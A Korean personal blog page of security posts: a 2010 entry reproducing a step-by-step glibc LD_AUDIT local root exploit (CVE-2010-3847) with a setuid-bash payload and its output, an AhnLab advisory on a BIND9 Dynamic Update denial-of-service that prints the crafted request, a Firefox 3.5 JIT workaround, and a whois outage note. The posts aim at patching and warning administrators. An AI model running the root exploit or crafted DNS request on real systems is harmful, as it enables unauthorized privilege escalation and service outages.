블로그 이미지
:: OTL ≠ 좌절 :: OTL = 운(運) ::
coriahn

Notice

Archive

  • 19,286total
  • 12today
  • 58yesterday

[긴급]RHEL/CENTOS/DEBIAN 5 & RHEL 6 / 에서 일반계정으로 쉽게 root 권한 획득하는 문제점 발견

2010/10/21 15:29 3-6. 보안

[긴급]RHEL/CENTOS/DEBIAN 5 & RHEL 6 / 에서 일반계정으로 쉽게 root 권한 획득하는 문제점 발견

레드햇 보안 취약성으로 IMPORT 레벨로 일반계정으로 ROOT 권한을 획득할 수 있는 방법과 패치입니다.


패치 방법과 내용은 위의 URL을 참고하세요.


 

>>>절차 

일반계정으로 접속후 아래와 같이 명령 진행

 

$ cd /tmp
$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
^D (ctrl +d)

 

 

$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 10월 21 09:38 /proc/16189/fd/3 -> /tmp/exploit/target
$ rm -rf /tmp/exploit/
$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 10월 21 09:38 /proc/16189/fd/3 -> /tmp/exploit/target (deleted)
$ cat payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
gcc: spec failure: unrecognized spec option 'M'
gcc: spec failure: unrecognized spec option 'M'
# LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
# whoami
root

 

여기서 부터는 root 권한으로 실행됨.

 

>>> 이에 대한 해결안 대략 2가지

1. 보통 두가지 해당 패키지를 YUM으로 업데이트 할것

2. sticky bit 가 있는 바이러리 디렉토리와 사용자가 쓸 수 있는 디렉토리를 파티션으로 분리할 것

 

출처: http://cafe.daum.net/redhat/D4GV/17

 

 

  • >>> 패치방법
    yum install yum-security
    yum update --cve CVE-2010-3847

저작자 표시
posted by coriahn
Trackback 0 Comment 0

ISC BIND9 Dynamic Update 요청을 통한 원격 서비스 거부 취약점

2009/07/31 10:13 3-6. 보안
◈ 제목
ISC BIND 9 "Dynamic Update" 요청을 통한 원격 서비스 거부 취약점

◈ 개요
ISC BIND 9 일부 버전에서 조작된 Dynamic Update 요청을 통해 서비스가 크래쉬될 수 있는 서비스 거부(Denial-of-Service) 취약점이 발견되었다.

◈ 공격유형
서비스 거부

◈ 해당시스템
  • BIND 9.4.3-P3, 9.5.1-P3, 9.6.1-P3 이전 버전들

    ◈ 영향
    공격자는 해당 취약점을 이용하여 서비스 거부 공격을 수행할 수 있다.

    ◈ 설명
    ISC BIND 9 일부 버전에서 조작된 Dynamic Update 요청을 통해 서비스가 크래쉬될 수 있는 서비스 거부(Denial-of-Service) 취약점이 발견되었다.
    Dynamic Update 기능은 BIND 8 버전 이후로 지원되며, Zone 파일의 레코드를 동적으로 갱신할 수 있는 기능이다.

    Dynamic Update 요청은 다음과 같은 구조를 갖는다.

    +---------------------------------------------------------+
    | Header | Zone | Prerequisite | Update | Additional Data |
    +---------------------------------------------------------+

    특히, 해당 취약점은 다음 공격 Dynamic Update 요청처럼 prerequisite 섹션에 "ANY" type 레코드를 갖고 적어도 하나 이상의 해당 FQDN의 RRset이 존재하는 경우에 발생한다.

    -------------------------------------------------------
    공격 Dynamic Update 요청
    -------------------------------------------------------
    ;; HEADER SECTION
    ;; id = 31081
    ;; qr = 0 opcode = UPDATE rcode = NOERROR
    ;; zocount = 0 prcount = 1 upcount = 0 adcount = 0

    ;; ZONE SECTION (1 record)
    ;; example.com. IN SOA

    ;; PREREQUISITE SECTION (1 record)
    www.example.com. 0 IN ANY ; no data
    ------------------------------------------------------

    해당 공격이 성공하는 경우, BIND 데몬이 크래쉬되어 도메인 요청에 대한 정상적인 서비스를 지원할 수 없게된다.

    해당 취약점은 Dynamic update 기능의 disable/enable에 상관없이 영향을 받기 때문에 매우 위험하다.

  • BIND Dynamic Update DoS(CVE-2009-0696)


    • ◈ 해결책
    해당 취약점은 Dynamic Update 기능에 상관없이 영향을 주기 때문에 다음과 같이 취약점이 존재하지 않는 상위버전으로 조속히 업그레이드하여야 한다.

    bind-9.6.1-P1
    http://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz
    bind-9.5.1-P3
    http://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz
    bind-9.4.3-P3
    http://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz


    ◈운영체제별 업데이트 정보

    다음은 운영체제별로 업데이트 하기 위한 방법을 기술한 것으로,
    운영하고 있는 OS 종류에 따라 관리자는 적절한 방법을 선택하면 된다.
    여기서는 일반적인 방법만을 언급하고 있으므로, 시스템별 세부적인 사항은 각 운영체제의 벤더 홈페이지를 참고하기 바란다.


    1) 데비안/우분투 리눅스
    # apt-get update
    # apt-get upgrade
    # /etc/init.d/bind9 restart

    2) 레드헷/페도라/CentOS 리눅스
    # yum update

    3) NetBSD
    # cd src
    # cvs update -d -P external/bsd/bind/dist
    # cd external/bsd/bind/bin/named
    # make USETOOLS=no cleandir dependall
    # make USETOOLS=no install

    4) OpenBSD

    # cd /usr/src
    # cvs -d anoncvs@anoncvs.ca.openbsd.org:/cvs -q up -Pd
    # cd /usr/src/sbin/bind
    # make -f Makefile.bsd-wrapper obj
    # make -f Makefile.bsd-wrapper depend
    # make -f Makefile.bsd-wrapper
    # make -f Makefile.bsd-wrapper install

    5) Solaris

    http://sunsolve.sun.com/search/document.do?assetkey=1-66-264828-1


    ◈ 참고사이트
    실시간 보안위협정보는 ASEC블로그를 통해 빠르게 확인하실 수 있습니다
    - ASEC Threat Research : http://blog.ahnlab.com/asec

    -------------------------------------------------------------------
    NO WARRANTY
    이 권고문은 ㈜안철수연구소의 ASEC에서 국내 인터넷 보안의 발전을 위하여 발표하는 보안 권고문이다.

    ASEC Contact Information
    Copyright 2002-2009 ASEC(Ahnlab Security E-response Center).
    All Rights Reserved.


    posted by coriahn
    TAG ahnlab, bind, dns, Exploit, 취약점
    Trackback 1 Comment 0

    Firefox 3.5에서 치명적인 오류가 발생.. -처리방법

    2009/07/17 10:34 3-6. 보안

    firefox 

    Secunia에 따르면 파이어폭스 3.5의 자바스크립트 엔진에 상당히 위험한 보안 결함이 발견되었다고 합니다. 특정 HTML 태그에서 자바스크립트 코드 처리 시 메모리 에러로 인해 임의적인 코드 실행이 가능해진다고 하는데요. 파이어폭스 3.5 버전 외에 다른 버전에서는 영향이 없을 거라 합니다.

    Mozilla에 서 이번 주말까지 느린 구동 속도 문제와 이번 자바스크립트 보안 문제를 해결하는 3.5.1 버전을 출시할 예정이지만 그때까지 걱정이 되시는 분들은 about:config에서 javascript.options.jit.content를 false로 설정해 주세요. JIT을 비활성화하면 자바스크립트 속도가 감소하는 만큼 그냥 일시적인 해결책이라고 합니다.

    해당 이슈는 3.6 nightly 버전에서는 이미 해결되었다고 하며 3.5.2 버전이 원래 3.5.1 버전에 포함될 버그 수정과 함께 7월말에 릴리즈 된다고 합니다.  

    posted by coriahn
    Trackback 0 Comment 0

    nida whois 서버 사망사건

    2009/07/08 18:05 3-6. 보안
    [root@Coriahn ~]# whois 168.126.63.2
    [Querying whois.arin.net]
    [Redirected to whois.apnic.net]
    [Querying whois.apnic.net]
    [Redirected to whois.krnic.net]
    [Querying whois.krnic.net]
    [whois.krnic.net]


    [root@Coriahn ~]#

    https://whois.nica.or.kr 에서 ktdns ip를 검색한결과 입니다..


    오전내내 DDOS때문에 고생했는데.. 저녁에 whois가 죽어주시는군..



    posted by coriahn
    TAG NIDA, nida whois is die, whois
    Trackback 0 Comment 0